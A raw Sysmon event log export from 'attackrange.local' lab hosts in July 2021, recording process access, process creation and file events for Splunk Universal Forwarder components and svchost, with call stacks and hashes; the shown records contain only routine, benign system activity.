10341000x8000000000000000809360Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:24.364{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809359Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:24.364{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809358Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:24.364{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809357Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:24.364{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809356Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:24.364{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F710-60EB-B979-00000000D001}2532C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809355Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:24.364{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F710-60EB-B979-00000000D001}2532C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809354Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:24.349{0C1E0330-F710-60EB-B979-00000000D001}2532C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809353Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:24.302{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA3F9445D3F8F2B28083B558CC47728E,SHA256=DF555B5D16F71CE31B948BAC0C3D42681C3049976BC2B725693DCC2BED9930F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052611Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:24.118{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D292E65A1CD06D22444638ABE71EA74E,SHA256=A5B59BA4CCB41F5A33219275BA7C7697C1460A18EF3C646C377F2CFDE068F48E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809396Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.614{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F711-60EB-BB79-00000000D001}2548C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809395Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.614{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809394Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.614{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809393Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.614{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809392Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.614{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809391Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.614{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809390Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.614{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809389Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.614{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809388Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.614{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809387Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.614{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809386Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.614{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F711-60EB-BB79-00000000D001}2548C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809385Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.614{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F711-60EB-BB79-00000000D001}2548C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809384Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.601{0C1E0330-F711-60EB-BB79-00000000D001}2548C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809383Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.599{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=20CE7151493F53D5DB3B040B893706B1,SHA256=4CFBFE593CAB7E3FD63BDB5069C277236EEA2F04FBC42B66035455361BD45222,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809382Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.599{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B284F49F0F4BCD2AAEDAB06B97DFE007,SHA256=9CE20EAF3654C916630E15E4B25D3791C2163F862974E9F73C2CBD9E9BD79D3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809381Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.599{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3869E49FAEE5370C2CA63D6F87E03CD5,SHA256=EF55E064A968C5F3AE9F628F27A0DA05F5ACD60196B1CE9B1A4CC7E23D911D6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052612Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:25.118{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69275C7B523225BAC6FA16C718B7BBD0,SHA256=462BB130297765F04A9F896B3448ACDBCFCF6AC127295CAC1D8117AB33B78A7C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809380Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.052{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F711-60EB-BA79-00000000D001}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809379Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.052{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809378Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.052{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809377Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 